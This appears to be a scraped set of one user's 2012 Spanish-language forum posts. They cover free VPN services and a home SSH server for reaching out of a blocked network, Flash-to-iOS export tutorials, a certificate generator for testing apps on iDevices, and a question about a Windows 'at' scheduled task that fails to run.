No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Excelente solo que cobra creo que 5 Euros al año
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Otra excelente solo que mas cara.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    ---------> Mi favorita ya que es totalmente gratuita


Ademas otra punto exclenete es que podemos configurar la pc de nuestra casa, creando un servidor ssh y asi conectarnos a nuestra casa desde la red bloqueada.

Les dejo este tuto que hice hace tiempo sobre como crear un servidor ssh en nuestra pc y por si quieren las de la red tambien viene en la pagina 6 como configurar el putty para hacerlo.

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Tambien les dejo este enlace donde enseña como configurar el navegador, solo recuerden usar su cuenta

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Aclaro que no son las únicas, existen muchas mas gratis, solo es cuestión de buscarlas

Cualquier duda con gusto les ayudaré

salu2
#33




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#34
IOS / Como exportar aplicacion flash a ipad
Abril 24, 2012, 03:50:52 PM
En este tuto que acabo de hacer explico como exportar una pelicula, juego o aplicacion creada en flash para poder probarla en nuestro iDevices.

Espero les guste

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#35


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#36
IOS / iOS Development with Flash
Abril 24, 2012, 03:03:00 PM


Aprender a crear aplicaciones usando flash y as3.

e-book muy recomendable

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#37


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#38
Simple, es para saber que celular es el mas comun en el foro, ademas de que sistema operativo usa.

En mi caso tengo un Iphone 4 con IOs 5.0
#39
IOS / Generador de Certificado para Idevices
Abril 24, 2012, 02:15:12 PM
Se preguntaran que es esto.

Bueno es un simple programita que genera certificados "oficiales" para poder exportar nuestras aplicaciones creadas por flash o flash builder y poder probarlas en cualquier dispositivo iOs (Iphone, Ipod, Ipad).

La contraseña sería: 1234


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#40
Tengo entendido ke el comando at es algo asi como tareas programadas.

Osea que sirve para ejecutar una acción a cierta hora

Quiero que se ejecute un script a una hora especifica, pero para probarlo estoy intentando crear una carpeta (como prueba) a una hora.

El problema es que no me crea nada.

Les pongo lo que estoy haciendo

Código: php
C:\Windows\system32>cd /

C:\>cd Users

C:\Users>cd Devilboy

C:\Users\Devilboy>cd Desktop

C:\Users\Devilboy\Desktop>at
No hay entradas en la lista.

C:\Users\Devilboy\Desktop>at 21:44 mkdir prueba
Se ha agregado un nuevo trabajo con identificador = 1

C:\Users\Devilboy\Desktop>
C:\Users\Devilboy\Desktop>at
Estado ID   Día                     Hora          Línea de comandos
--------------------------------------------------------------------
        1   Hoy                     09:44 p.m.    mkdir prueba

C:\Users\Devilboy\Desktop>


al llegar a las 21:44 el comando desaparece (como si se hubiera ejecutado) pero no crea ninguna carpeta.

He probado con otros comandos como borras un archivo o abrir el navegador de internet, pero ninguno me da resultado.

Alguno sabe ke puede ser??

estoy usando windows 7 con permisos de admin

salu2